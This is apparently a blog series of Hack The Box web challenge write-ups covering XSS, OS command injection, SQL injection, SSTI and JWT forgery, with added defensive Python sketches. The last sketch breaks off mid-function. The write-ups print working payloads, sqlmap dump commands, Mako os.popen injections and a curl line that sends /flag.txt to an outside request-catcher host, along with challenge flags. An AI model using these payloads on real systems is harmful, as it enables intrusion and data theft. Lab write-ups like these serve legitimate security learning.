Hack The Box – SpookTastic

SpookTastic is a very easy web challenge created by leanthedev on Hack The Box. It requires basic code review and XSS to complete. Hello world, welcome to haxez where today I will be trying to complete the SpookTastic web challenge. Fortunately, this time I was able to download the source code which made things a bit easier.

SpookTastic Application Enumeration

As with all application challenges, I fired up OWASP ZAP, opened Firefox and navigated to the application. I wasn’t sure what the function of the application was. It appeared to have a store where it sold a few products. Furthermore, there was also a register email option at the bottom of the page, which is where the vulnerability was. Other than that, there wasn’t much else. I ran an Ajax Spider and Active Scan but it didn’t find much.

SpookTastic Application Enumeration

Source Code Review

I extracted the downloaded files and opened the app.py file. After reading through the file I noticed that the API register endpoint had an if statement in it pointing to a blacklist function. If the value submitted to the register input box didn’t pass the blacklist function then it wouldn’t work. I went hunting for the blacklist function and found that it checks to see whether the word script is included. It appeared to be some form of validation on the user input.

Source Code Review

Exploiting SpookTastic

Please note that I was not able to complete this challenge in Firefox. For some reason, the popup box didn’t appear when submitting the correct payload. Anyway, in the code there is a function that spawns a window with the flag. I’m not 100% sure about the code that recognises the XSS but that is something I will come back to in my own time. Anyway, in order to solve the challenge, you need to trigger an XSS pop up without using the script tag. There are a few payloads that can do this but I used the one below.

<img src=err onerror=alert('haxez')>

That created an alert and gave me the flag to solve the challenge.
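Added example, not code from the challenge's app.py: a Python sketch of the substring blacklist described above next to plain output encoding, run over the img payload from this write-up. The blacklist function, the rendering helpers and the sample inputs are assumptions made for illustration.

```python
import html
import re

# Constructed sample inputs for this example: the payload from the write-up,
# the script tag the blacklist is aimed at, and a plain address.
SAMPLES = {
    "plain": "ghost@haunted.example",
    "script_tag": "<script>alert(1)</script>",
    "img_onerror": "<img src=err onerror=alert('haxez')>",
}


def blacklist_blocks(value: str) -> bool:
    """Mimics the check the write-up describes in app.py: reject the input if
    the word 'script' appears. Assumed to be a plain substring test; the
    challenge's exact implementation is not reproduced on the page."""
    return "script" in value


def render_unsafe(value: str) -> str:
    """Builds the confirmation markup by string concatenation, so any tag that
    survives the blacklist reaches the browser as live HTML."""
    return f"<p>Registered: {value}</p>"


def render_escaped(value: str) -> str:
    """Output encoding for an HTML text context: the input is treated as text
    whatever tag or attribute it contains, so no blacklist is needed."""
    return f"<p>Registered: {html.escape(value, quote=True)}</p>"


TAG_RE = re.compile(r"<\s*[a-zA-Z]")


def contains_live_tag(markup: str) -> bool:
    """Rough detection helper for this example: does the rendered output still
    carry an unescaped tag opener inside the user-controlled part?"""
    body = markup[len("<p>Registered: "):-len("</p>")]
    return bool(TAG_RE.search(body))


def evaluate(value: str) -> dict:
    """Reports what each layer does with one input so the two defences can be
    compared side by side."""
    blocked = blacklist_blocks(value)
    return {
        "blocked_by_blacklist": blocked,
        "unsafe_has_live_tag": (not blocked) and contains_live_tag(render_unsafe(value)),
        "escaped_has_live_tag": (not blocked) and contains_live_tag(render_escaped(value)),
    }


if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(name, evaluate(value))
```

The img payload never contains the word script, so the blacklist lets it through, while the escaped rendering turns it into inert text.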

SpookTastic XSS.

SpookTastic Learnings

What’s great about the challenges where you can download the code is that you can see the protection mechanisms in place. One thing I have always struggled with is understanding how payloads bypass protection mechanisms. Everything makes much more sense once you actually see the backend code of the application. Anyway this was a fun challenge.

Hack The Box – TimeKORP

TimeKORP is a very easy web challenge created by makelaris on Hack The Box. This challenge requires performing a remote code execution attack. Hello world, welcome to haxez where today I will be putting my web hacking skills to the test by trying to compromise the TimeKORP very easy web challenge. Unlike some of the other challenges I’ve previously completed, this challenge doesn’t have any files to download. Let’s crack on.

TimeKORP Application Enumeration

First, I launched OWASP ZAP (because I’m trying to learn it) and navigated to the provided IP address. Once the application loaded, I was presented with a fairly basic page that displayed the time. After clicking the ‘What is the date?’ link at the top of the page, I was shown the current date. That was the extent of the application functionality.

TimeKORP Application Enumeration

ZAP It

As I was viewing the application through ZAP, I decided to run the Ajax spidering tool to see if there was any content that I was missing. Other than an assets and a static directory, which contained nothing interesting, there wasn’t anything else for me to look at.

ZAP Discovery

As a result, I decided I should active scan the application. Granted, it isn’t always advised to use active scan. This is especially true with pages that contain sensitive functionality. However, these labs were designed to test out tools so that is exactly what I did.

TimeKORP Active Scan

Using the OWASP ZAP browser HUD, I clicked the active scan button and waited for it to finish. As you can see from the image below, ZAP was able to find several issues ranging in severity from informational, low risk, medium risk and high risk. The informational, low and medium risk findings were all fairly standard misconfigurations such as a missing Content Security Policy header. However, the high risk finding was a Remote OS Command Injection vulnerability.

TimeKORP ZAP Active Scan

Poking The Bug

I navigated through the HUD to view and replay the request in the browser. The active scan performed a sleep command and I assume it detected that the page took a second to respond thus indicating the application was vulnerable. The URL below is the payload that active scan used to determine there was a vulnerability.

https://94.237.54.164:31059/?format=%25H%3A%25M%3A%25S%27%26sleep+1.0%26%27

I modified that code to further confirm the vulnerability by running a few different commands. For example, I ran the whoami command, which told me I was www.

https://94.237.54.164:31059/?format=%25H%3A%25M%3A%25S%27%26whoami%26%27

I ran a few other commands such as uptime to confirm I had code execution as the output on the screen wasn’t all that revealing.

https://94.237.54.164:31059/?format=%25H%3A%25M%3A%25S%27%26uptime%26%27
TimeKORP RCE

Finding The Flag

This is where things got a bit obscure. I used the ls flag and performed various directory traversals but I couldn’t find the location of the flag. What’s odd is that I could list out the views directory and see the index.php but not the flag. I didn’t think it could be a permissions issue as if I was allowed to read the flag file then I should be able to see it. Furthermore, the flag file didn’t start with a dot so it wasn’t a hidden file either. Anyway, I finally found the flag one directory above and was able to read it using the following URL.

https://94.237.54.164:31059/?format=%25H%3A%25M%3A%25S%27%26cat%20../flag%26%27
TimeKORP

TimeKORP Learnings

I remember a quote, I think it was from Darknet Diaries. It said that hacking is like trying to navigate a maze in the dark. You have no way of knowing where you’re going or even if you are going in the right way. I’m paraphrasing but that reflects my thoughts on this challenge. When I first started penetration testing and doing web applications I was told never to use Burp Active Scan. They explained it was because it could break applications. I’ve looked at some of the payloads and believe it to be absolutely true. However, I’m trying to adopt a new mindset of active scan where you can but ensure the client has a backup.

Hack The Box – KORP Terminal

KORP Terminal is a very easy web challenge created by leanthedev on Hack The Box. This challenge requires knowledge of SQL injection. Unlike previous tasks, we don’t have the option to look at the source code for this challenge. Hello world, welcome to haxez where today I will be attempting to own KORP Terminal.

KORP Terminal Application Enumeration

Upon navigating to the application, we are presented with a blue background and a login box. That’s it. You can view the source code but there isn’t much there to view. I ran OWASP ZAP Ajax spider and active scan against it but it didn’t find anything other than the low hanging fruit of HTTP headers. The application has a login box but that’s it. As a result, I attempted some default creds such as admin admin but no luck.

KORP Terminal Application Enumeration

Attacking The Application

Since there isn’t anything else other than the login form, I’m going to go out on a limb and say that I’m supposed to attack that. There are multiple ways that we could attack it. For example, we could use something like Hydra to try and brute force our way in. However, since we don’t know the username, we could be here all day. Instead, let’s assume that it is powered by a database and start with some basic SQL injection attacks. To start with, I input a single quote into both the username and password box. As shown below, the application is indeed vulnerable to SQL injection due to the lack of prepared statements.

SQL Injection

Preparing The Request

To attack the login form, I’m going to use sqlmap. However, first I need a valid POST request containing the username and password parameters. Did you know that if you specify an asterisk (*) in the parameters of the request, sqlmap will automatically recognise them as insertion points? I didn’t until today. As you can see below, I found the login POST request in ZAP and copied the request to a file called request.txt.

KORP Terminal OWASP ZAP.

KORP Terminal SQL Injection

To keep it short and sweet, I ran sqlmap against the request. It automatically identified the insertion points and found that it was vulnerable. Next, I simply told sqlmap to dump the database and eureka! it spat out a username and password hash. As you can see from the image below, the username is admin and the password hash appears to be a bcrypt hash (at least according to hashcat examples).

sudo sqlmap -r request.txt --ignore-code 401 --dump
sqlmap

Hash Cracking

Next, it was time to crack the hash. As per the link above in the hashcat examples, you can find the type of hash and the cracking mode needed to crack it. I used the rockyou wordlist because it is a fairly common wordlist and most of the passwords for these challenges and the boxes tend to appear in there. After a few minutes (running on a vm because noob) I cracked the hash. As you can see from the screenshot below, the password was password123. With the username admin and the newly cracked password, I was able to login and get the hash.

hashcat
HTB{t3rm1n4l_cr4ck1ng_4nd_0th3r_sh3n4nig4n5}

KORP Terminal Learnings

Not much to say about this one. It was a nice fun quick challenge before I power down for the evening. I suppose a lesson that can be taken from this challenge is not to rely on automated scanners like Burp or OWASP Active Scan. They don’t always find a vulnerability that could easily be found by just submitting a single quotation mark. I find it odd that it didn’t find the error but anyway that’s all from today.

Hack The Box – Phantom Script

Phantom Script is a very easy web challenge created by Xclow3n on Hack The Box. This challenge is simple as the answer is on the page. However, I believe the purpose of this challenge is to understand why one works but not the other. Hello world, welcome to haxez where today I will be exploiting an XSS vulnerability.

Phantom Script Application Enumeration

The application is very basic, offering only a search box to search through the different scrolls on the page. To the right of the search box is the vulnerable code. Finally, underneath the vulnerable code are some example payloads. The answer is right there on the page; all you need to do is test the different payloads and eventually the flag will pop up. But why does it pop up?

Phantom Script Application Enumeration

HTML Child Elements

When we test the first payload of:

<script>alert('Boo!');</script>

The browser renders the script tag as plain text rather than executing it. This happens because the script tag is not treated as a child element of the parent h2 tag. It is instead interpreted as part of the element’s textual content. As a result, the payload does not work for XSS in this case.

Using the <script> tag.

However, if we use an img element, it is rendered as HTML because the browser recognises img as a valid child element. The browser parses the img element properly, and attributes like onerror are processed, allowing for XSS execution.

<img src=x onerror="alert('Boo!')">
Phantom Script XSS Working

The Flag

After submitting the payload, click the alert box to close it and the flag will appear on the screen like magic.

The Flag
HTB{xS5_iS_34SY_wh4t_d0_you_th1nk?}

Phantom Script Learnings

I must admit that this answered a question that I’ve been struggling with for a long time. It’s great being able to find bugs but understanding why they are there makes finding them easier. Before doing this challenge, I didn’t know that only child elements would work when rendered in an HTML tag. I suspect I have missed multiple opportunities to get XSS because of this reason. This is why it is important to do additional reading when going through challenges and boxes.

Hack The Box – Unholy Union

Unholy Union is a very easy box created by Xclow3n on Hack The Box. As the name suggests, we will need some SQL skills to complete this challenge. Hello world, welcome to haxez where today I will be refreshing my SQLi skills and attempting to complete this very easy challenge. I haven’t done proper SQL injection in a while, especially UNION based injection.

Unholy Union Application Enumeration

I started by navigating to the page in my browser. With these challenges, there is usually fairly little to actually enumerate. The vulnerability tends to be fairly obvious but it’s exploiting that vulnerability that’s the problem. As you can see from the image below, OWASP ZAP found the SQL injection vulnerability without issue. However, finding the vulnerability and getting the flag are two different problems entirely. I could run SQL map against it and try and dump the whole database. Actually, that’s exactly what I’m going to do.

Unholy Union Application Enumeration

The Easy Way With SQLMAP

First, I wanted to check if the database was vulnerable so I ran the following command and identified that there were 5 columns.

sqlmap -u http://94.237.54.42:37032/search?query= --level=5 --risk=3
The Easy Way With SQLMAP

Next, I ran the following command to get the database names. I could have just dumped everything but that would be a lot of data to sort through and would take much longer. As you can see from the results below, I found three databases.

sqlmap -u http://94.237.54.42:37032/search?query= --union-cols=5 --dbs
SQLMAP get database names

It seemed fairly obvious that the database I needed was called halloween_invetory so I specified that in the next query and used it to dump the tables in that database.

sqlmap -u http://94.237.54.42:37032/search?query= --union-cols=5 -D halloween_invetory --tables
SQLMAP dumping Unholy Union tables

With the name of the database and the table I was able to use sqlmap to dump the contents of the table and retrieve the flag. It was fairly obvious which table contained the flag. As you can see below, I used the following command to dump the flag and complete the challenge.

sqlmap -u http://94.237.54.42:37032/search?query= --union-cols=5 -D halloween_invetory -T flag --dump
HTB{un10n_1Nj3ct1on_15_345y_t0_l34rn_r1gh17?} 

The Hard Way

I’m not going to go into too much detail on this method as I have already got the flag. However, in order to perform a UNION based SQL injection you would first identify whether the application is vulnerable. This is often achieved by placing a single quotation mark or a ` in the query to break the syntax. As shown below, the application does produce an error message when breaking the syntax.

Unholy Union SQL error

Next, you would determine how many columns there are by using NULL value columns. To explain, using the NULL value means no data. Therefore, it should produce an error due to the formatting of the column. Furthermore, if the number of columns is wrong, the database will produce an error. For example, if I used three NULL columns and tried to concatenate in to the fourth column I would get an error.

Gun' UNION SELECT NULL, NULL, NULL, (SELECT GROUP_CONCAT(SCHEMA_NAME) FROM information_schema.schemata) -- -

However, if I used 4 NULL columns and then concatenate the results into the 5th column, it works. The syntax would be correct as there are 5 columns. As you can see from the image below, the syntax is correct and the data from the information schema table is dumped.

Working SQL injection

This method can then be used to find the names of the databases, tables and to eventually select the data from the flag table.
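Added example (not the challenge's code, which the page does not show): an in-memory SQLite model of the two behaviours described in the KORP Terminal and Unholy Union write-ups, the single quote that breaks the query and the UNION whose column count must match the five real columns, beside the parameterised query that stops both. The table names, rows and flag value are constructed placeholders; the SQLite error text differs from MySQL's but the mechanism is the same.

```python
import sqlite3

# Constructed in-memory schema modelled on the write-up's description: a
# five-column inventory table behind /search?query= and a separate flag table.
# Names, rows and the flag value are assumed for this example.
SCHEMA = """
CREATE TABLE halloween_inventory (id INTEGER, name TEXT, category TEXT, price REAL, stock INTEGER);
INSERT INTO halloween_inventory VALUES (1, 'Gunpowder Pumpkin', 'decor', 9.99, 4);
INSERT INTO halloween_inventory VALUES (2, 'Ghost Lantern', 'lighting', 14.50, 12);
CREATE TABLE flag (flag TEXT);
INSERT INTO flag VALUES ('HTB{placeholder_flag_for_example}');
"""


def connect() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn: sqlite3.Connection, query: str) -> list:
    """The pattern both write-ups describe: user input concatenated straight
    into the SQL with no prepared statement. Raises sqlite3.OperationalError
    when the syntax breaks (the single-quote test) or when a UNION does not
    match the column count."""
    sql = (
        "SELECT id, name, category, price, stock FROM halloween_inventory "
        f"WHERE name LIKE '%{query}%'"
    )
    return conn.execute(sql).fetchall()


def search_parameterized(conn: sqlite3.Connection, query: str) -> list:
    """Same lookup with a bound parameter: the input can only ever be a value
    for the LIKE pattern, so a quote or a UNION keyword is just text."""
    sql = "SELECT id, name, category, price, stock FROM halloween_inventory WHERE name LIKE ?"
    return conn.execute(sql, (f"%{query}%",)).fetchall()


def probe(conn: sqlite3.Connection, fn, query: str) -> dict:
    """Runs one input through a search function and reports either the rows
    returned or the database error text, which is what an error-based test
    (or a scanner) keys on."""
    try:
        return {"error": None, "rows": fn(conn, query)}
    except sqlite3.OperationalError as exc:
        return {"error": str(exc), "rows": []}


# The three probes from the write-ups: the single quote that breaks syntax,
# a UNION with one column too few, and one that matches the five columns.
SINGLE_QUOTE = "'"
UNION_4 = "Gun' UNION SELECT NULL, NULL, NULL, (SELECT flag FROM flag) -- -"
UNION_5 = "Gun' UNION SELECT NULL, NULL, NULL, NULL, (SELECT flag FROM flag) -- -"

if __name__ == "__main__":
    conn = connect()
    for label, q in (("quote", SINGLE_QUOTE), ("union4", UNION_4), ("union5", UNION_5)):
        print(label, "vulnerable:", probe(conn, search_vulnerable, q))
        print(label, "parameterized:", probe(conn, search_parameterized, q))
```

With the parameterised query every probe returns an empty result and no error, which is why the error message is the signal to look for when the scanner reports nothing.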

Flag returned

Unholy Union Learnings

I should have spent more time going through this one to do it manually but I’m a bit short on time. It was a fun challenge anyway and it jogged my memory on a few things. I struggled with the injection syntax as it has been a long time since I have done it manually. You could argue that is why we have tools but I don’t think that’s a good attitude to have. I understand the vulnerability though and how it is structured. It’s just remembering what to use where.

Hack The Box – WayWitch

WayWitch is a very easy web challenge created by Xclow3n on Hack The Box. To complete this challenge you need an understanding of JWT. Hello world, welcome to haxez where today I am going to complete the WayWitch web challenge. This challenge was a lot of fun and was fairly easy to complete. While I already understood JWT, it was good to refresh that knowledge.

WayWitch Application Enumeration

To load the application, I needed to specify HTTPS. The challenges I have completed so far have all been HTTP. Attempting to connect via HTTP returned a connection reset error. After loading the application, it was evident that it was some type of ticketing system. There was no login or any other functionality.

WayWitch Application Enumeration

Source Code Review

The web challenges allow you to download the source code. This allows for a white box style assessment in that you get to see the code behind the application. After downloading the zip file, I opened the routes.js. The routes file typically controls the logic behind navigating the application. For example, index.html is a route. As you can see below, there is a route for tickets.

WayWitch Source Code Review

I attempted to navigate to the tickets route or page and received an error explaining that access was denied and that admin privileges were required. This was expected as the source code of the application has an if statement based on the contents of the session token. As seen above, the if statement checks the session token to see whether username is equal to admin. If it matches, it will allow the user to view the tickets route. With that in mind, I knew that I could forge a JWT cookie to contain the username admin. However, in order to do that we need the JWT secret signing key.

WayWitch Tickets

WayWitch Secret

I opened the util.js code and the secret was there. Furthermore, the secret can also be obtained by inspecting the web application’s page source. This demonstrates why it is always important to view the page source of an application when testing it. This is something I neglect to do more than I care to admit. However, with this example now demonstrating the importance of doing so, I will be sure to be more diligent.

Forging The JWT

I took the existing cookie from my browser by inspecting the page and heading to the application tab. From there I took the value of the session_token cookie and pasted it into jwt.io. Next, I updated the username to admin and changed the secret key to the one found in the source code (halloween-secret).

Forging The JWT

I then copied the returned encoded JWT and pasted it into the value of the session_token in my browser. Next, I refreshed the page and the spooky black magic had worked. I now had access to the tickets route and could see all the tickets that had been previously submitted. Furthermore, the tickets contained the flag, thus allowing me to solve the challenge.

WayWitch Flag
HTB{k33p_th3s3_jwt_s3cr3t_s4f3f_br0}

WayWitch Learnings

This was a very fun challenge. It wasn’t too difficult and the code was easy to understand. It was very obvious that in order to access the tickets page, I needed to meet the conditions set out in the if statement (having the username be admin). With that said, I believe that if I hadn’t found the JWT secret in the page source, I might have got stuck for a bit trying to submit the new cookie without the secret. This was another great web challenge and I’m enjoying going through them. I suspect I will start hitting a wall when I get to the easy and medium challenges.

Hack The Box – Void Whispers

Void Whispers is a very easy web challenge created by Xclow3n on Hack The Box. In order to solve it you will need some web and Linux skills. Hello world, welcome to haxez where today I’m looking at Void Whispers. Admittedly, I found the problem from the source code quite quickly but didn’t have a clue how to exploit it.

Void Whispers Application Enumeration

Upon initially navigating to the application, it was fairly obvious where the exploit was going to be. The application takes certain parameters and then appears to update a configuration file somewhere. However, the thing that instantly caught my eye was the path to the send mail binary.

Void Whispers Application Enumeration

My initial thought was to specify the binary. Then, perhaps I could use the other input fields to specify the command. As a result, I attempted to specify the path to bash and run simple commands like whoami and ls. Neither of them worked, despite how I input the values. I also attempted to active scan the page using Zap but it didn’t find anything.

Source Code Analysis

I’m not great at programming, in fact, I’m dreadful at it. I was surprised that I immediately knew where the vulnerability was as soon as I saw it. Ok, I sort of knew where the vulnerability was. I was right about the location but wrong about the problem. This issue can be found in the IndexController.php file on line 40. As you can see, the output of shell_exec is being passed to the $whichOutput variable.

$whichOutput = shell_exec("which $sendMailPath");
if (empty($whichOutput)) {
    return $router->jsonify(['message' => 'Binary does not exist!', 'status' => 'danger'], 400);
}
Source Code Analysis

Now, I initially thought that the vulnerability was going to be due to code not using the absolute path. However, that quickly passed as that would make no sense for the current context. We wouldn’t be able to create our own binary called which.

Void Whispers Exploitation

I am happy to have identified that the code looked like it was an issue. However, the issue was more to do with validation. As you can see from the highlighted code below, the code only validates to see whether there are any spaces. So, provided we can fool it in to accepting spaces, we should be able to append any other command.

Fortunately, Bash has something called an Internal Field Separator or IFS which is exactly what it sounds like. It is a separator or a space. However, this is where I ran into more problems. I tried several commands, but the output of those commands was not returned in the response. This is why Zap did not find the command execution.

Exfiltrating The Data

This type of blind exploit is where I tend to have trouble. If the application does not scream at me that it is vulnerable, then I start to think I am completely wrong and should move on to something else. It is the same with blind SQL injection, blind XSS and any other blind exploit. It is like trying to navigate a maze in complete darkness. This is where the try harder mindset comes in. Anyway, there is this useful application called request catcher that allows you to send requests to it. By appending a curl command and cat command to the send mail binary path we can POST the flag to request catcher.

/usr/bin/curl;curl${IFS}-X${IFS}POST${IFS}heapbytes.requestcatcher.com/test${IFS}-d${IFS}"$(cat${IFS}/flag.txt)"
HTB{c0mm4nd_1nj3ct1on_15_3457_t0_f1nD!}
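Added example, not code from either challenge: the space-only check described for Void Whispers beside allowlist validation for the two injected parameters on this page (TimeKORP's date format and Void Whispers' binary path), plus the shell-free way to do each job. The sample values are decoded from the URLs in the write-ups with the request-catcher host replaced by a placeholder; the regexes and helper names are assumptions for illustration.

```python
import re
import shutil
from datetime import datetime
from typing import Optional

# Constructed sample parameters, decoded from the write-ups' URLs (placeholder host).
TIMEKORP_BENIGN = "%H:%M:%S"
TIMEKORP_INJECTED = "%H:%M:%S'&sleep 1.0&'"  # ZAP's time-based probe
SENDMAIL_BENIGN = "/usr/sbin/sendmail"
SENDMAIL_INJECTED = '/usr/bin/curl;curl${IFS}-X${IFS}POST${IFS}catcher.invalid/test${IFS}-d${IFS}"$(cat${IFS}/flag.txt)"'
EXAMPLE_NOW = datetime(2024, 10, 31, 23, 59, 58)  # fixed clock for a reproducible result


def weak_no_space_check(value: str) -> bool:
    """The only validation the Void Whispers write-up describes: reject input
    containing a literal space. ${IFS} expands to a space inside the shell,
    after this check has already run, so it does nothing against injection."""
    return " " not in value


# Allowlist for a time format: strftime directives plus a few separators.
# Letters may only appear as part of a %-directive, so 'sleep' cannot pass.
FORMAT_RE = re.compile(r"^(?:%[HMSIpdmYyjbBaAZz]|[ :\-/.,T])+$")

# Allowlist for a binary path: absolute, plain path characters, nothing the
# shell would interpret (no ; & | $ ` " ' ( ) and no whitespace of any kind).
PATH_RE = re.compile(r"^/(?:[A-Za-z0-9._-]+/)*[A-Za-z0-9._-]+$")


def valid_time_format(fmt: str) -> bool:
    return FORMAT_RE.fullmatch(fmt) is not None


def valid_binary_path(path: str) -> bool:
    return PATH_RE.fullmatch(path) is not None


def render_time(fmt: str, now: Optional[datetime] = None) -> str:
    """TimeKORP's job without a shell: validate, then format in-process.
    There is no 'date' command line for the parameter to break out of."""
    if not valid_time_format(fmt):
        raise ValueError("format contains characters outside the allowlist")
    return (now or datetime.now()).strftime(fmt)


def binary_exists(path: str) -> bool:
    """Void Whispers' 'which' lookup without shell_exec: validate the path, then
    ask the OS directly. shutil.which on an absolute path only checks that the
    file exists and is executable; no shell ever sees the string."""
    if not valid_binary_path(path):
        raise ValueError("path contains characters outside the allowlist")
    return shutil.which(path) is not None


if __name__ == "__main__":
    for v in (SENDMAIL_BENIGN, SENDMAIL_INJECTED):
        print(repr(v), "no-space check:", weak_no_space_check(v), "allowlist:", valid_binary_path(v))
    for v in (TIMEKORP_BENIGN, TIMEKORP_INJECTED):
        print(repr(v), "allowlist:", valid_time_format(v))
    print(render_time(TIMEKORP_BENIGN, EXAMPLE_NOW))
```

Note that the IFS payload passes the no-space check while ZAP's probe, which contains a literal space, would have been rejected by it, which is consistent with the scanner finding nothing on this challenge.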

Void Whispers Learnings

So, for once I can say that finding the exploit was fairly simple. I was surprised that I was able to spot it easily. I am not sure if it’s because I have worked with PHP previously and was more comfortable reading it. Honestly, it was because shell_exec immediately set off alarm bells as shell is bad right? So that part was not too bad but trying to find a way to exploit it was difficult for me. With that said, I had a lot of fun but have realised that I am out of practice and need to start drilling again.

Hack The Box – Spookifier

Spookifier is a very easy web challenge created by Xclow3n on Hack The Box. To hack it, we will need to exploit Server Side Template Injection. Hello world, welcome to haxez where today we will hack the Spookifier challenge. The challenge has the following introduction:

There’s a new trend of an application that generates a spooky name for you. Users of that application later discovered that their real names were also magically changed, causing havoc in their life. Could you help bring down this application?

Enumerating Spookifier

Upon navigating to the page, we are greeted with a purple web application with some graphics and an input box. Furthermore, the box asks us to input our name so that it can spookify it and produce our new spooky name. After inputting our name, the application appears to output our name but in a different font.

Enumerating Spookifier

Source Code Review

Back in the Hack The Box portal there is an option to download the files associated with the challenge. Fortunately for me, we live in an age of AI which should more than make up for my complete lack of programming skills. Honestly, I wouldn’t recognise a code vulnerability even if the variable was named exploit_me.

Source Code Review

from flask import Blueprint, request
from flask_mako import render_template
from application.util import spookify

web = Blueprint('web', __name__)

@web.route('/')
def index():
    text = request.args.get('text')
    if(text):
        converted = spookify(text)
        return render_template('index.html',output=converted)
    
    return render_template('index.html',output='')

Looking through the code it appears to be a Python web framework or Flask application with Mako which is a templating engine. Furthermore, the purpose of the application is to process user input dynamically and render HTML. At least, that’s what AI is telling me.

Understanding The Vulnerability

The application has a vulnerability because it directly renders user input text in the template using the render_template function, without any input sanitization or validation. I’m not going to dig much deeper than that because that would cause me to go down rabbit holes and its already getting late. However, the vulnerability could potentially be fixed by adding safe_output = Markup.escape(converted) to properly escape the text. With that said, we can try an SSTI payload and see if we get the expected result. As you can see below, I have submitted ${404*2} which if calculated correctly should return Bob or 808.

Understanding The Spookifier Vulnerability

Exploiting Spookifier

Now that we know it is vulnerable, we can get a payload from PayloadAllTheThings and modify it for our purposes. First, we will need to list out the current directory and the directories above it to find the flag.

${self.module.cache.util.os.popen('ls ../').read()}

Then once we know where the flag is, we can modify the payload again to read the flag.

${self.module.cache.util.os.popen('cat ../flag.txt').read()}
Exploiting Spookifier
HTB{t3mpl4t3_1nj3ct10n_C4n_3x1st5_4nywh343!!}

Spookifier Learnings

So I believe this vulnerability would have been found quickly with either Burp or Zap but as Iron Man once said to Spider-Man…

If you’re nothing without the suit (tools) then you shouldn’t have it

I understand why this application is vulnerable even if I don’t fully understand the Python and Mako templates that make it vulnerable. User input sanitisation is important for all untrusted data being input into an application. Anyway, that’s it. Also my spellcheck tools are playing up so there are probably errors, sorry.

Hack The Box – Flag Command

Flag Command is a very easy web challenge created by Xclow3n on Hack The Box. To solve this challenge you need to review the requests. Hello world, welcome to haxez where today I will be attempting to solve the Flag Command web challenge.

Getting Started With Flag Command

In order to get started with Flag Command, we must first head to the challenges section within Hack The Box. From there, we need to find the web section and go to the retired challenges. Next, we can filter the challenges by very easy and it will be one of the first in the list. Once you have found the challenge, simply click Spawn Instance to start the instance. It will give you an IP address that you can visit in your browser.

Spawning Flag Command

Application Enumeration

Once we visit the IP address, we receive some text explaining that we have found ourselves in a bizarre alien forest. Additionally, we have no idea how we got there but we can hear eerie indistinguishable sounds. The text explains more but this is clearly designed to mimic an old text adventure game. Therefore, we should be able to input commands to play the game. One of the first commands that it is always worth testing is the help command. That will tell you how to play the game.

Application Help Menu

As you can see from the image above, we have several commands that we can use. Furthermore, using the info command just spits the text back out at us so we need to dig a little deeper. However, our aim here isn’t to play the game, is it? Our aim is to hack the game.

Inspecting Flag Command

By right clicking on the page and clicking inspect, we can bring up the developer console. Next, if we refresh the page we will capture the traffic that the browser is sending and receiving. For example, if we click on the network tab and click the refresh button, we can see all the individual scripts that are being loaded by the browser.

Inspecting the application

Solving The Challenge

By looking through each one of the Javascript files, we eventually get to the options files which appears to contain all the possible game commands. However, hiding at the bottom of the options file is a secret command called secret. The value of this command is as follows:

Blip-blop, in a pickle with a hiccup! Shmiggity-shmack
Flag Command Secret Command

Therefore, if we type start to start the game and then input the secret command, we win. The flag is returned to the screen, which we can then paste back into the Hack The Box challenge page and solve the challenge.

Solving the challenge
HTB{D3v3l0p3r_t00l5_4r3_b35t__t0015_wh4t_d0_y0u_Th1nk??}

Flag Command Learnings

This was a fun challenge. It reminded me of my early days when I first started learning hacking on Hack This Site. Granted, it is a bit more complex than just viewing the page source to find the password but times have evolved since then. Low hanging fruit on applications seems to be getting higher and higher as our understanding of security improves. Anyway, I love web challenges. The themes of them are always fun rather than just looking at a terminal for hours. Not that I don’t sometimes enjoy that too.

Hack The Box – Didactic Octo Paddles

Didactic Octo Paddles was the sixth web challenge from the Hack The Box Cyber Apocalypse Capture The Flag competition. It was also the bane of my existence and my worst enemy. Hello world, welcome to Haxez where today I will be explaining how I eventually hacked Didactic Octo Paddles. All the challenges had a description fitting the theme of the CTF and this one was no different.

You have been hired by the Intergalactic Ministry of Spies to retrieve a powerful relic that is believed to be hidden within the small paddle shop, by the river. You must hack into the paddle shop’s system to obtain information on the relic’s location. Your ultimate challenge is to shut down the parasitic alien vessels and save humanity from certain destruction by retrieving the relic hidden within the Didactic Octo Paddles shop.

Application Adventure

This application broke me for all the wrong reasons. It was a great challenge and I learnt a lot from it but tiny mistakes made me waste so much time. Anyway, upon navigating to the application, I was greeted with a purple login page. There was no apparent option to register so I immediately thought it was SQL injection again. It wasn’t.

Application Adventure

Blasting Didactic Octo Paddles

Using my new favourite web application file and directory discovery tool Ferric Oxide, I was able to discover a few endpoints. As you can see from the screenshot below there were endpoints for registration, administration and authentication. I guess the way in wasn’t via SQL injection after all. With this new knowledge, I headed to the registration section and registered a new user.

Blasting Didactic Octo Paddles

Didactic Octo Paddles Store

Upon registering and logging in I was met with a store page. I had a lot of fun wasting my time with this functionality. Initially, I thought I was being clever by changing the number of the item that you add to the cart. I thought I was clever by doing a lot of things. None of them made a difference. The objective of this challenge was to gain access to the admin area at ‘/admin’.

Didactic Octo Paddles Store

Cookies, Cookies, Cookies

After digging around the application a bit more and identifying the frameworks, I started learning about JWT tokens. I haven’t done much with them before as I don’t test many web applications. I then started playing with the JWT token with JWT_Tool. Unfortunately, I have a lot to learn with this tool and at the time I was tired so decided just to use Burp.

You can see from the screenshot below that I used the Burp extension JSON Web Tokens to set the “alg” to none and the “id” to 1. I then sent the request to the admin endpoint and I was authenticated. It’s a shame that I couldn’t get this to work with JWT_Tool. I could go through and manually change the values but I wanted it to catch the successful authentication through automated testing.
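Added example covering both the WayWitch and Didactic Octo Paddles cookie problems, written with the standard library rather than the challenges' own Node code: a minimal HS256 signer to show what jwt.io did with the leaked halloween-secret, an alg=none token like the one set in Burp, and a verifier that pins the algorithm and rejects the forged token once the secret is rotated. The secret value is quoted from the write-up; the claim names, helper names and the rotated key are assumptions.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

LEAKED_SECRET = "halloween-secret"  # the value found in util.js / page source per the write-up


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _segment(obj: dict) -> str:
    return _b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(claims: dict, secret: str) -> str:
    """Minimal HS256 signer: anyone holding the secret, including someone who
    read it from the page source, can mint a token the server trusts."""
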